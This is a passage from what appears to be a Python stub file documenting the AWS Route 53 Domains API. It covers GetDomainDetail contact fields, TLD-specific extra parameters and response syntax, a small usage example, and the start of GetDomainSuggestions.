FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) --The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) --The value that corresponds with the name of an extra parameter.
TechContact (dict) --Provides details about the domain technical contact.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) --The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) --The value that corresponds with the name of an extra parameter.
AdminPrivacy (boolean) --Specifies whether contact information is concealed from WHOIS queries. If the value is true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If the value is false , WHOIS queries return the information that you entered for the admin contact.
RegistrantPrivacy (boolean) --Specifies whether contact information is concealed from WHOIS queries. If the value is true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If the value is false , WHOIS queries return the information that you entered for the registrant contact (domain owner).
TechPrivacy (boolean) --Specifies whether contact information is concealed from WHOIS queries. If the value is true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If the value is false , WHOIS queries return the information that you entered for the technical contact.
RegistrarName (string) --Name of the registrar of the domain as identified in the registry. Domains with a .com, .net, or .org TLD are registered by Amazon Registrar. All other domains are registered by our registrar associate, Gandi. The value for domains that are registered by Gandi is "GANDI SAS" .
WhoIsServer (string) --The fully qualified name of the WHOIS server that can answer the WHOIS query for the domain.
RegistrarUrl (string) --Web address of the registrar.
AbuseContactEmail (string) --Email address to contact to report incorrect contact information for a domain, to report that the domain is being used to send spam, to report that someone is cybersquatting on a domain name, or to report some other type of abuse.
AbuseContactPhone (string) --Phone number for reporting abuse.
RegistryDomainId (string) --Reserved for future use.
CreationDate (datetime) --The date when the domain was created as found in the response to a WHOIS query. The date and time is in Unix time format and Coordinated Universal Time (UTC).
UpdatedDate (datetime) --The last updated date of the domain as found in the response to a WHOIS query. The date and time is in Unix time format and Coordinated Universal Time (UTC).
ExpirationDate (datetime) --The date when the registration for the domain is set to expire. The date and time is in Unix time format and Coordinated Universal Time (UTC).
Reseller (string) --Reseller of the domain. Domains registered or transferred using Route 53 domains will have "Amazon" as the reseller.
DnsSec (string) --Reserved for future use.
StatusList (list) --An array of domain name status codes, also known as Extensible Provisioning Protocol (EPP) status codes.
ICANN, the organization that maintains a central database of domain names, has developed a set of domain name status codes that tell you the status of a variety of operations on a domain name, for example, registering a domain name, transferring a domain name to another registrar, renewing the registration for a domain name, and so on. All registrars use this same set of status codes.
For a current list of domain name status codes and an explanation of what each code means, go to the ICANN website and search for epp status codes . (Search on the ICANN website; web searches sometimes return an old version of the document.)
(string) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'DomainName': 'string',
'Nameservers': [
{
'Name': 'string',
'GlueIps': [
'string',
]
},
],
'AutoRenew': True|False,
'AdminContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'RegistrantContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'TechContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'AdminPrivacy': True|False,
'RegistrantPrivacy': True|False,
'TechPrivacy': True|False,
'RegistrarName': 'string',
'WhoIsServer': 'string',
'RegistrarUrl': 'string',
'AbuseContactEmail': 'string',
'AbuseContactPhone': 'string',
'RegistryDomainId': 'string',
'CreationDate': datetime(2015, 1, 1),
'UpdatedDate': datetime(2015, 1, 1),
'ExpirationDate': datetime(2015, 1, 1),
'Reseller': 'string',
'DnsSec': 'string',
'StatusList': [
'string',
]
}
:returns:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
"""
pass
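# Illustrative sketch: pulling a few fields out of the large GetDomainDetail response.
# The domain name is a placeholder; credentials are assumed.
def _example_get_domain_detail():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    detail = client.get_domain_detail(DomainName='example.com')
    print(detail['RegistrarName'], detail['ExpirationDate'])
    for ns in detail['Nameservers']:
        print(ns['Name'], ns.get('GlueIps', []))
    print('EPP status codes:', detail.get('StatusList', []))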
def get_domain_suggestions(DomainName=None, SuggestionCount=None, OnlyAvailable=None):
"""
The GetDomainSuggestions operation returns a list of suggested domain names.
See also: AWS API Documentation
Exceptions
:example: response = client.get_domain_suggestions(
DomainName='string',
SuggestionCount=123,
OnlyAvailable=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nA domain name that you want to use as the basis for a list of possible domain names. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\nInternationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 .\n
:type SuggestionCount: integer
:param SuggestionCount: [REQUIRED]\nThe number of suggested domain names that you want Route 53 to return. Specify a value between 1 and 50.\n
:type OnlyAvailable: boolean
:param OnlyAvailable: [REQUIRED]\nIf OnlyAvailable is true , Route 53 returns only domain names that are available. If OnlyAvailable is false , Route 53 returns domain names without checking whether they\'re available to be registered. To determine whether the domain is available, you can call checkDomainAvailability for each suggestion.\n
:rtype: dict
Returns
Response Syntax
{
'SuggestionsList': [
{
'DomainName': 'string',
'Availability': 'string'
},
]
}
Response Structure
(dict) --
SuggestionsList (list) --
A list of possible domain names. If you specified true for OnlyAvailable in the request, the list contains only domains that are available for registration.
(dict) --
Information about one suggested domain name.
DomainName (string) --
A suggested domain name.
Availability (string) --
Whether the domain name is available for registering.
Note
You can register only the domains that are designated as AVAILABLE .
Valid values:
AVAILABLE
The domain name is available.
AVAILABLE_RESERVED
The domain name is reserved under specific conditions.
AVAILABLE_PREORDER
The domain name is available and can be preordered.
